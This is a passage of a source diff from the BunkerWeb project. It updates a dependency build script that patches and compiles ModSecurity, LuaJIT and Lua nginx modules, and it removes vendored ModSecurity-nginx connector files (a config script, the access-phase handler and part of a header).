CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd ./configure --disable-dependency-tracking --disable-static --disable-examples --disable-doxygen-doc --disable-doxygen-html --disable-valgrind-memcheck --disable-valgrind-helgrind --prefix=/usr/share/bunkerweb/deps --with-maxmind=/usr/share/bunkerweb/deps
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd make -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd make install-strip
|
||||
|
||||
# Compiling and installing luajit2
|
||||
echo "ℹ️ Compiling and installing luajit2"
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit2" do_and_check_cmd make -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit2" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps install
|
||||
# Compiling and installing luajit
|
||||
echo "ℹ️ Compiling and installing luajit"
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit" do_and_check_cmd make -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps install
|
||||
|
||||
# Installing lua-resty-core
|
||||
echo "ℹ️ Installing openresty/lua-resty-core"
|
||||
|
@ -107,6 +110,7 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/luasec" do_and_check_cmd make LUACPATH=/usr/
|
|||
|
||||
# Installing lua-resty-ipmatcher
|
||||
echo "ℹ️ Installing lua-resty-ipmatcher"
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/lua-resty-ipmatcher/resty/ipmatcher.lua /tmp/bunkerweb/deps/misc/ipmatcher.patch
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-ipmatcher" do_and_check_cmd make INST_PREFIX=/usr/share/bunkerweb/deps INST_LIBDIR=/usr/share/bunkerweb/deps/lib/lua INST_LUADIR=/usr/share/bunkerweb/deps/lib/lua install
|
||||
|
||||
# Installing lua-resty-redis
|
||||
|
@ -119,6 +123,7 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-upload" do_and_check_cmd make PREF
|
|||
|
||||
# Installing lujit-geoip
|
||||
echo "ℹ️ Installing luajit-geoip"
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/luajit-geoip/geoip/mmdb.lua /tmp/bunkerweb/deps/misc/mmdb.patch
|
||||
do_and_check_cmd cp -r /tmp/bunkerweb/deps/src/luajit-geoip/geoip /usr/share/bunkerweb/deps/lib/lua
|
||||
|
||||
# Installing lbase64
|
||||
|
@ -143,11 +148,13 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-lock" do_and_check_cmd make PREFIX
|
|||
|
||||
# Installing lua-resty-openssl
|
||||
echo "ℹ️ Installing lua-resty-openssl"
|
||||
do_and_check_cmd rm -r /tmp/bunkerweb/deps/src/lua-resty-openssl/t
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-openssl" do_and_check_cmd make LUA_LIB_DIR=/usr/share/bunkerweb/deps/lib/lua install
|
||||
do_and_check_cmd cp /tmp/bunkerweb/deps/src/lua-resty-openssl/lib/resty/openssl.lua /usr/share/bunkerweb/deps/lib/lua/resty
|
||||
|
||||
# Installing lua-ffi-zlib
|
||||
echo "ℹ️ Installing lua-ffi-zlib"
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/lua-ffi-zlib/lib/ffi-zlib.lua /tmp/bunkerweb/deps/misc/lua-ffi-zlib.patch
|
||||
do_and_check_cmd cp /tmp/bunkerweb/deps/src/lua-ffi-zlib/lib/ffi-zlib.lua /usr/share/bunkerweb/deps/lib/lua
|
||||
|
||||
# Installing lua-resty-signal
|
||||
|
@ -155,6 +162,12 @@ echo "ℹ️ Installing lua-resty-signal"
|
|||
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-signal" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-signal" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps LUA_LIB_DIR=/usr/share/bunkerweb/deps/lib/lua install
|
||||
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_log.c /tmp/bunkerweb/deps/misc/modsecurity-nginx.patch
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/config /tmp/bunkerweb/deps/misc/config.patch
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_common.h /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_common.h.patch
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_module.c /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_module.c.patch
|
||||
do_and_check_cmd cp /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_access.c /tmp/bunkerweb/deps/src/modsecurity-nginx/src
|
||||
|
||||
# Compile dynamic modules
|
||||
echo "ℹ️ Compiling and installing dynamic modules"
|
||||
CONFARGS="$(nginx -V 2>&1 | sed -n -e 's/^.*arguments: //p')"
|
||||
|
@ -164,13 +177,15 @@ CONFARGS="$(echo -n "$CONFARGS" | sed "s/--with-ld-opt='-Wl/--with-ld-opt='-lpcr
|
|||
if [ "$OS" = "fedora" ] ; then
|
||||
CONFARGS="$(echo -n "$CONFARGS" | sed "s/--with-ld-opt='.*'/--with-ld-opt=-lpcre/" | sed "s/--with-cc-opt='.*'//")"
|
||||
fi
|
||||
echo '#!/bin/bash' > "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
|
||||
echo "./configure $CONFARGS --add-dynamic-module=/tmp/bunkerweb/deps/src/headers-more-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/nginx_cookie_flag_module --add-dynamic-module=/tmp/bunkerweb/deps/src/lua-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_brotli --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_devel_kit --add-dynamic-module=/tmp/bunkerweb/deps/src/stream-lua-nginx-module" --add-dynamic-module=/tmp/bunkerweb/deps/src/ModSecurity-nginx >> "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
|
||||
do_and_check_cmd chmod +x "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" LUAJIT_LIB="/usr/share/bunkerweb/deps/lib -Wl,-rpath,/usr/share/bunkerweb/deps/lib" LUAJIT_INC="/usr/share/bunkerweb/deps/include/luajit-2.1" MODSECURITY_LIB="/usr/share/bunkerweb/deps/lib" MODSECURITY_INC="/usr/share/bunkerweb/deps/include" do_and_check_cmd ./configure-fix.sh
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" do_and_check_cmd make -j $NTASK modules
|
||||
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd mv auto/configure ./
|
||||
echo '#!/bin/bash' > "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
|
||||
echo "./configure $CONFARGS --add-dynamic-module=/tmp/bunkerweb/deps/src/headers-more-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/nginx_cookie_flag_module --add-dynamic-module=/tmp/bunkerweb/deps/src/lua-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_brotli --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_devel_kit --add-dynamic-module=/tmp/bunkerweb/deps/src/stream-lua-nginx-module" --add-dynamic-module=/tmp/bunkerweb/deps/src/modsecurity-nginx >> "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
|
||||
do_and_check_cmd chmod +x "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" LUAJIT_LIB="/usr/share/bunkerweb/deps/lib -Wl,-rpath,/usr/share/bunkerweb/deps/lib" LUAJIT_INC="/usr/share/bunkerweb/deps/include/luajit-2.1" MODSECURITY_LIB="/usr/share/bunkerweb/deps/lib" MODSECURITY_INC="/usr/share/bunkerweb/deps/include" do_and_check_cmd ./configure-fix.sh
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd make -j $NTASK modules
|
||||
do_and_check_cmd mkdir /usr/share/bunkerweb/modules
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" do_and_check_cmd cp ./objs/*.so /usr/share/bunkerweb/modules
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd cp ./objs/*.so /usr/share/bunkerweb/modules
|
||||
|
||||
# Dependencies are installed
|
||||
echo "ℹ️ Dependencies for BunkerWeb successfully compiled and installed !"
|
||||
|
|
|
@ -1,192 +0,0 @@
|
|||
# vim: filetype=sh
|
||||
|
||||
# If $NGX_IGNORE_RPATH is set to "YES", we will ignore explicit
|
||||
# library path specification on resulting binary, allowing libmodsecurity.so
|
||||
# to be relocated across configured library pathes (adjust /etc/ld.so.conf
|
||||
# or set $LD_LIBRARY_PATH environment variable to manage them)
|
||||
#
|
||||
# $YAJL_LIB variable may need to be populated in case of non-standard
|
||||
# path of libyajl.so's installation
|
||||
|
||||
ngx_feature_name=
|
||||
ngx_feature_run=no
|
||||
ngx_feature_incs="#include <modsecurity/modsecurity.h>"
|
||||
ngx_feature_libs="-lmodsecurity"
|
||||
ngx_feature_test='printf("hello");'
|
||||
ngx_modsecurity_opt_I=
|
||||
ngx_modsecurity_opt_L=
|
||||
|
||||
YAJL_EXTRA=
|
||||
if test -n "$YAJL_LIB"; then
|
||||
YAJL_EXTRA="-L$YAJL_LIB -lyajl"
|
||||
fi
|
||||
|
||||
# If $MODSECURITY_INC is specified, lets use it. Otherwise lets try
|
||||
# the default paths
|
||||
#
|
||||
if [ -n "$MODSECURITY_INC" -o -n "$MODSECURITY_LIB" ]; then
|
||||
# explicitly set ModSecurity lib path
|
||||
ngx_feature="ModSecurity library in \"$MODSECURITY_LIB\" and \"$MODSECURITY_INC\" (specified by the MODSECURITY_LIB and MODSECURITY_INC env)"
|
||||
ngx_feature_path="$MODSECURITY_INC"
|
||||
ngx_modsecurity_opt_I="-I$MODSECURITY_INC"
|
||||
ngx_modsecurity_opt_L="-L$MODSECURITY_LIB $YAJL_EXTRA"
|
||||
|
||||
if [ $NGX_RPATH = YES ]; then
|
||||
ngx_feature_libs="-R$MODSECURITY_LIB -L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
|
||||
elif [ "$NGX_IGNORE_RPATH" != "YES" -a $NGX_SYSTEM = "Linux" ]; then
|
||||
ngx_feature_libs="-Wl,-rpath,$MODSECURITY_LIB -L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
|
||||
else
|
||||
ngx_feature_libs="-L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
|
||||
fi
|
||||
|
||||
. auto/feature
|
||||
|
||||
if [ $ngx_found = no ]; then
|
||||
cat << END
|
||||
$0: error: ngx_http_modsecurity_module requires the ModSecurity library and MODSECURITY_LIB is defined as "$MODSECURITY_LIB" and MODSECURITY_INC (path for modsecurity.h) "$MODSECURITY_INC", but we cannot find ModSecurity there.
|
||||
END
|
||||
exit 1
|
||||
fi
|
||||
else
|
||||
# auto-discovery
|
||||
ngx_feature="ModSecurity library"
|
||||
ngx_feature_libs="-lmodsecurity"
|
||||
|
||||
. auto/feature
|
||||
|
||||
if [ $ngx_found = no ]; then
|
||||
ngx_feature="ModSecurity library in /usr/local/modsecurity"
|
||||
ngx_feature_path="/usr/local/modsecurity/include"
|
||||
if [ $NGX_RPATH = YES ]; then
|
||||
ngx_feature_libs="-R/usr/local/modsecurity/lib -L/usr/local/modsecurity/lib -lmodsecurity"
|
||||
elif [ "$NGX_IGNORE_RPATH" != "YES" -a $NGX_SYSTEM = "Linux" ]; then
|
||||
ngx_feature_libs="-Wl,-rpath,/usr/local/modsecurity/lib -L/usr/local/modsecurity/lib -lmodsecurity"
|
||||
else
|
||||
ngx_feature_libs="-L/usr/local/modsecurity/lib -lmodsecurity"
|
||||
fi
|
||||
|
||||
. auto/feature
|
||||
|
||||
fi
|
||||
fi
|
||||
|
||||
|
||||
|
||||
if [ $ngx_found = no ]; then
|
||||
cat << END
|
||||
$0: error: ngx_http_modsecurity_module requires the ModSecurity library.
|
||||
END
|
||||
exit 1
|
||||
fi
|
||||
|
||||
|
||||
ngx_addon_name=ngx_http_modsecurity_module
|
||||
|
||||
# We must place ngx_http_modsecurity_module after ngx_http_gzip_filter_module
|
||||
# in load order list to be able to read response body before it gets compressed
|
||||
# (for filter modules later initialization means earlier execution).
|
||||
#
|
||||
# Nginx implements load ordering only for dynamic modules and only a BEFORE part
|
||||
# of "ngx_module_order". So we list all of the modules that come after
|
||||
# ngx_http_gzip_filter_module as a BEFORE dependency for
|
||||
# ngx_http_modsecurity_module.
|
||||
#
|
||||
# For static compilation HTTP_FILTER_MODULES will be patched later.
|
||||
|
||||
modsecurity_dependency="ngx_http_postpone_filter_module \
|
||||
ngx_http_ssi_filter_module \
|
||||
ngx_http_charset_filter_module \
|
||||
ngx_http_xslt_filter_module \
|
||||
ngx_http_image_filter_module \
|
||||
ngx_http_sub_filter_module \
|
||||
ngx_http_addition_filter_module \
|
||||
ngx_http_gunzip_filter_module \
|
||||
ngx_http_userid_filter_module \
|
||||
ngx_http_headers_filter_module \
|
||||
ngx_http_copy_filter_module"
|
||||
|
||||
|
||||
if test -n "$ngx_module_link"; then
|
||||
ngx_module_type=HTTP_FILTER
|
||||
ngx_module_name="$ngx_addon_name"
|
||||
ngx_module_srcs="$ngx_addon_dir/src/ngx_http_modsecurity_module.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_access.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_header_filter.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_body_filter.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_log.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_rewrite.c \
|
||||
"
|
||||
ngx_module_deps="$ngx_addon_dir/src/ddebug.h \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_common.h \
|
||||
"
|
||||
ngx_module_libs="$ngx_feature_libs"
|
||||
ngx_module_incs="$ngx_feature_path"
|
||||
|
||||
ngx_module_order="ngx_http_chunked_filter_module \
|
||||
ngx_http_v2_filter_module \
|
||||
ngx_http_range_header_filter_module \
|
||||
ngx_http_gzip_filter_module \
|
||||
$ngx_module_name \
|
||||
$modsecurity_dependency";
|
||||
|
||||
. auto/module
|
||||
else
|
||||
CFLAGS="$ngx_modsecurity_opt_I $CFLAGS"
|
||||
NGX_LD_OPT="$ngx_modsecurity_opt_L $NGX_LD_OPT"
|
||||
|
||||
CORE_INCS="$CORE_INCS $ngx_feature_path"
|
||||
CORE_LIBS="$CORE_LIBS $ngx_feature_libs"
|
||||
|
||||
HTTP_FILTER_MODULES="$HTTP_FILTER_MODULES ngx_http_modsecurity_module"
|
||||
NGX_ADDON_SRCS="\
|
||||
$NGX_ADDON_SRCS \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_module.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_access.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_header_filter.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_body_filter.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_log.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_rewrite.c \
|
||||
"
|
||||
|
||||
NGX_ADDON_DEPS="\
|
||||
$NGX_ADDON_DEPS \
|
||||
$ngx_addon_dir/src/ddebug.h \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_common.h \
|
||||
"
|
||||
fi
|
||||
|
||||
#
|
||||
# Nginx does not provide reliable way to introduce our module into required
|
||||
# place in static ($ngx_module_link=ADDON) compilation mode, so we must
|
||||
# explicitly update module "ordering rules".
|
||||
#
|
||||
if [ "$ngx_module_link" != DYNAMIC ] ; then
|
||||
# Reposition modsecurity module to satisfy $modsecurity_dependency
|
||||
# (this mimics dependency resolution made by ngx_add_module() function
|
||||
# though less optimal in terms of computational complexity).
|
||||
modules=
|
||||
found=
|
||||
for module in $HTTP_FILTER_MODULES; do
|
||||
# skip our module name from the original list
|
||||
if [ "$module" = "$ngx_addon_name" ]; then
|
||||
continue
|
||||
fi
|
||||
if [ -z "${found}" ]; then
|
||||
for item in $modsecurity_dependency; do
|
||||
if [ "$module" = "$item" ]; then
|
||||
modules="${modules} $ngx_addon_name"
|
||||
found=1
|
||||
break
|
||||
fi
|
||||
done
|
||||
fi
|
||||
modules="${modules} $module"
|
||||
done
|
||||
if [ -z "${found}" ]; then
|
||||
# This must never happen since ngx_http_copy_filter_module must be in HTTP_FILTER_MODULES
|
||||
# and we stated dependency on it in $modsecurity_dependency
|
||||
echo "$0: error: cannot reposition modsecurity module in HTTP_FILTER_MODULES list"
|
||||
exit 1
|
||||
fi
|
||||
HTTP_FILTER_MODULES="${modules}"
|
||||
fi
|
|
@ -1,228 +0,0 @@
|
|||
/*
|
||||
* ModSecurity connector for nginx, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
*/
|
||||
|
||||
#ifndef MODSECURITY_DDEBUG
|
||||
#define MODSECURITY_DDEBUG 0
|
||||
#endif
|
||||
#include "ddebug.h"
|
||||
|
||||
#include "ngx_http_modsecurity_common.h"
|
||||
|
||||
void
|
||||
ngx_http_modsecurity_request_read(ngx_http_request_t *r)
|
||||
{
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
|
||||
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
|
||||
|
||||
#if defined(nginx_version) && nginx_version >= 8011
|
||||
r->main->count--;
|
||||
#endif
|
||||
|
||||
if (ctx->waiting_more_body)
|
||||
{
|
||||
ctx->waiting_more_body = 0;
|
||||
r->write_event_handler = ngx_http_core_run_phases;
|
||||
ngx_http_core_run_phases(r);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
ngx_int_t
|
||||
ngx_http_modsecurity_access_handler(ngx_http_request_t *r)
|
||||
{
|
||||
#if 1
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
ngx_http_modsecurity_conf_t *mcf;
|
||||
|
||||
dd("catching a new _access_ phase handler");
|
||||
|
||||
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
|
||||
if (mcf == NULL || mcf->enable != 1)
|
||||
{
|
||||
dd("ModSecurity not enabled... returning");
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
/*
|
||||
* FIXME:
|
||||
* In order to perform some tests, let's accept everything.
|
||||
*
|
||||
if (r->method != NGX_HTTP_GET &&
|
||||
r->method != NGX_HTTP_POST && r->method != NGX_HTTP_HEAD) {
|
||||
dd("ModSecurity is not ready to deal with anything different from " \
|
||||
"POST, GET or HEAD");
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
*/
|
||||
|
||||
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
|
||||
|
||||
dd("recovering ctx: %p", ctx);
|
||||
|
||||
if (ctx == NULL)
|
||||
{
|
||||
dd("ctx is null; Nothing we can do, returning an error.");
|
||||
return NGX_HTTP_INTERNAL_SERVER_ERROR;
|
||||
}
|
||||
|
||||
if (ctx->intervention_triggered) {
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
|
||||
if (ctx->waiting_more_body == 1)
|
||||
{
|
||||
dd("waiting for more data before proceed. / count: %d",
|
||||
r->main->count);
|
||||
|
||||
return NGX_DONE;
|
||||
}
|
||||
|
||||
if (ctx->body_requested == 0)
|
||||
{
|
||||
ngx_int_t rc = NGX_OK;
|
||||
|
||||
ctx->body_requested = 1;
|
||||
|
||||
dd("asking for the request body, if any. Count: %d",
|
||||
r->main->count);
|
||||
/**
|
||||
* TODO: Check if there is any benefit to use request_body_in_single_buf set to 1.
|
||||
*
|
||||
* saw some module using this request_body_in_single_buf
|
||||
* but not sure what exactly it does, same for the others options below.
|
||||
*
|
||||
* r->request_body_in_single_buf = 1;
|
||||
*/
|
||||
r->request_body_in_single_buf = 1;
|
||||
r->request_body_in_persistent_file = 1;
|
||||
if (!r->request_body_in_file_only) {
|
||||
// If the above condition fails, then the flag below will have been
|
||||
// set correctly elsewhere. We need to set the flag here for other
|
||||
// conditions (client_body_in_file_only not used but
|
||||
// client_body_buffer_size is)
|
||||
r->request_body_in_clean_file = 1;
|
||||
}
|
||||
|
||||
rc = ngx_http_read_client_request_body(r,
|
||||
ngx_http_modsecurity_request_read);
|
||||
if (rc == NGX_ERROR || rc >= NGX_HTTP_SPECIAL_RESPONSE) {
|
||||
#if (nginx_version < 1002006) || \
|
||||
(nginx_version >= 1003000 && nginx_version < 1003009)
|
||||
r->main->count--;
|
||||
#endif
|
||||
|
||||
return rc;
|
||||
}
|
||||
if (rc == NGX_AGAIN)
|
||||
{
|
||||
dd("nginx is asking us to wait for more data.");
|
||||
|
||||
ctx->waiting_more_body = 1;
|
||||
return NGX_DONE;
|
||||
}
|
||||
}
|
||||
|
||||
if (ctx->waiting_more_body == 0)
|
||||
{
|
||||
int ret = 0;
|
||||
int already_inspected = 0;
|
||||
|
||||
dd("request body is ready to be processed");
|
||||
|
||||
r->write_event_handler = ngx_http_core_run_phases;
|
||||
|
||||
ngx_chain_t *chain = r->request_body->bufs;
|
||||
|
||||
/**
|
||||
* TODO: Speed up the analysis by sending chunk while they arrive.
|
||||
*
|
||||
* Notice that we are waiting for the full request body to
|
||||
* start to process it, it may not be necessary. We may send
|
||||
* the chunks to ModSecurity while nginx keep calling this
|
||||
* function.
|
||||
*/
|
||||
|
||||
if (r->request_body->temp_file != NULL) {
|
||||
ngx_str_t file_path = r->request_body->temp_file->file.name;
|
||||
const char *file_name = ngx_str_to_char(file_path, r->pool);
|
||||
if (file_name == (char*)-1) {
|
||||
return NGX_HTTP_INTERNAL_SERVER_ERROR;
|
||||
}
|
||||
/*
|
||||
* Request body was saved to a file, probably we don't have a
|
||||
* copy of it in memory.
|
||||
*/
|
||||
dd("request body inspection: file -- %s", file_name);
|
||||
|
||||
msc_request_body_from_file(ctx->modsec_transaction, file_name);
|
||||
|
||||
already_inspected = 1;
|
||||
} else {
|
||||
dd("inspection request body in memory.");
|
||||
}
|
||||
|
||||
while (chain && !already_inspected)
|
||||
{
|
||||
u_char *data = chain->buf->pos;
|
||||
|
||||
msc_append_request_body(ctx->modsec_transaction, data,
|
||||
chain->buf->last - data);
|
||||
|
||||
if (chain->buf->last_buf) {
|
||||
break;
|
||||
}
|
||||
chain = chain->next;
|
||||
|
||||
/* XXX: chains are processed one-by-one, maybe worth to pass all chains and then call intervention() ? */
|
||||
|
||||
/**
|
||||
* ModSecurity may perform stream inspection on this buffer,
|
||||
* it may ask for a intervention in consequence of that.
|
||||
*
|
||||
*/
|
||||
ret = ngx_http_modsecurity_process_intervention(ctx->modsec_transaction, r, 0);
|
||||
if (ret > 0) {
|
||||
return ret;
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* At this point, all the request body was sent to ModSecurity
|
||||
* and we want to make sure that all the request body inspection
|
||||
* happened; consequently we have to check if ModSecurity have
|
||||
* returned any kind of intervention.
|
||||
*/
|
||||
|
||||
/* XXX: once more -- is body can be modified ? content-length need to be adjusted ? */
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(r->pool);
|
||||
msc_process_request_body(ctx->modsec_transaction);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
ret = ngx_http_modsecurity_process_intervention(ctx->modsec_transaction, r, 0);
|
||||
if (r->error_page) {
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
if (ret > 0) {
|
||||
return ret;
|
||||
}
|
||||
}
|
||||
|
||||
dd("Nothing to add on the body inspection, reclaiming a NGX_DECLINED");
|
||||
#endif
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
|
|
@ -1,173 +0,0 @@
|
|||
/*
|
||||
* ModSecurity connector for nginx, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
*/
|
||||
|
||||
|
||||
#ifndef _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_
|
||||
#define _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_
|
||||
|
||||
#include <nginx.h>
|
||||
#include <ngx_config.h>
|
||||
#include <ngx_core.h>
|
||||
#include <ngx_http.h>
|
||||
|
||||
#include <modsecurity/modsecurity.h>
|
||||
#include <modsecurity/transaction.h>
|
||||
|
||||
|
||||
/* #define MSC_USE_RULES_SET 1 */
|
||||
|
||||
#if defined(MODSECURITY_CHECK_VERSION)
|
||||
#if MODSECURITY_VERSION_NUM >= 304010
|
||||
#define MSC_USE_RULES_SET 1
|
||||
#endif
|
||||
#endif
|
||||
|
||||
#if defined(MSC_USE_RULES_SET)
|
||||
#include <modsecurity/rules_set.h>
|
||||
#else
|
||||
#include <modsecurity/rules.h>
|
||||
#endif
|
||||
|
||||
|
||||
/**
|
||||
* TAG_NUM:
|
||||
*
|
||||
* Alpha - 001
|
||||
* Beta - 002
|
||||
* Dev - 010
|
||||
* Rc1 - 051
|
||||
* Rc2 - 052
|
||||
* ... - ...
|
||||
* Release- 100
|
||||
*
|
||||
*/
|
||||
|
||||
#define MODSECURITY_NGINX_MAJOR "1"
|
||||
#define MODSECURITY_NGINX_MINOR "0"
|
||||
#define MODSECURITY_NGINX_PATCHLEVEL "3"
|
||||
#define MODSECURITY_NGINX_TAG ""
|
||||
#define MODSECURITY_NGINX_TAG_NUM "100"
|
||||
|
||||
#define MODSECURITY_NGINX_VERSION MODSECURITY_NGINX_MAJOR "." \
|
||||
MODSECURITY_NGINX_MINOR "." MODSECURITY_NGINX_PATCHLEVEL \
|
||||
MODSECURITY_NGINX_TAG
|
||||
|
||||
#define MODSECURITY_NGINX_VERSION_NUM MODSECURITY_NGINX_MAJOR \
|
||||
MODSECURITY_NGINX_MINOR MODSECURITY_NGINX_PATCHLEVEL \
|
||||
MODSECURITY_NGINX_TAG_NUM
|
||||
|
||||
#define MODSECURITY_NGINX_WHOAMI "ModSecurity-nginx v" \
|
||||
MODSECURITY_NGINX_VERSION
|
||||
|
||||
typedef struct {
|
||||
ngx_str_t name;
|
||||
ngx_str_t value;
|
||||
} ngx_http_modsecurity_header_t;
|
||||
|
||||
|
||||
typedef struct {
|
||||
ngx_http_request_t *r;
|
||||
Transaction *modsec_transaction;
|
||||
ModSecurityIntervention *delayed_intervention;
|
||||
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
/*
|
||||
* Should be filled with the headers that were sent to ModSecurity.
|
||||
*
|
||||
* The idea is to compare this set of headers with the headers that were
|
||||
* sent to the client. This check was placed because we don't have control
|
||||
* over other modules, thus, we may partially inspect the headers.
|
||||
*
|
||||
*/
|
||||
ngx_array_t *sanity_headers_out;
|
||||
#endif
|
||||
|
||||
unsigned waiting_more_body:1;
|
||||
unsigned body_requested:1;
|
||||
unsigned processed:1;
|
||||
unsigned logged:1;
|
||||
unsigned intervention_triggered:1;
|
||||
} ngx_http_modsecurity_ctx_t;
|
||||
|
||||
|
||||
typedef struct {
|
||||
void *pool;
|
||||
ModSecurity *modsec;
|
||||
ngx_uint_t rules_inline;
|
||||
ngx_uint_t rules_file;
|
||||
ngx_uint_t rules_remote;
|
||||
} ngx_http_modsecurity_main_conf_t;
|
||||
|
||||
|
||||
typedef struct {
|
||||
void *pool;
|
||||
/* RulesSet or Rules */
|
||||
void *rules_set;
|
||||
|
||||
ngx_flag_t enable;
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
ngx_flag_t sanity_checks_enabled;
|
||||
#endif
|
||||
|
||||
ngx_http_complex_value_t *transaction_id;
|
||||
} ngx_http_modsecurity_conf_t;
|
||||
|
||||
|
||||
typedef ngx_int_t (*ngx_http_modsecurity_resolv_header_pt)(ngx_http_request_t *r, ngx_str_t name, off_t offset);
|
||||
|
||||
typedef struct {
|
||||
ngx_str_t name;
|
||||
ngx_uint_t offset;
|
||||
ngx_http_modsecurity_resolv_header_pt resolver;
|
||||
} ngx_http_modsecurity_header_out_t;
|
||||
|
||||
|
||||
extern ngx_module_t ngx_http_modsecurity_module;
|
||||
|
||||
/* ngx_http_modsecurity_module.c */
|
||||
